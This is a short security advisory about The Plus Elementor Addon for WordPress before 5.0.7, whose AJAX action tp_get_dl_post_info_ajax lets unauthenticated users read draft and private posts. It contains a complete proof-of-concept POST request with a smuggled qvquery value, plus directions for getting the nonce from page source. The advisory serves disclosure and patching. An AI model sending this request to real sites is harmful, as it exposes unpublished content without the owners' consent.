The plugin does not validate the qvquery parameter of the tp_get_dl_post_info_ajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts
The following request allow an unauthenticated user to get the draft posts (the nonce can be retrieved by looking at the source code of pages/posts for ‘var theplus_nonce = “xxxx”;’) POST /wp-admin/admin-ajax.php HTTP/2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Content-Length: 134 action=tp_get_dl_post_info_ajax&security;=a71d02fefb&product;_id=1&qvquery;=post%26post_status=draft%26p=%26post_type=any%26nopaging=true
CPE | Name | Operator | Version |
---|---|---|---|
theplus_elementor_addon | lt | 5.0.7 |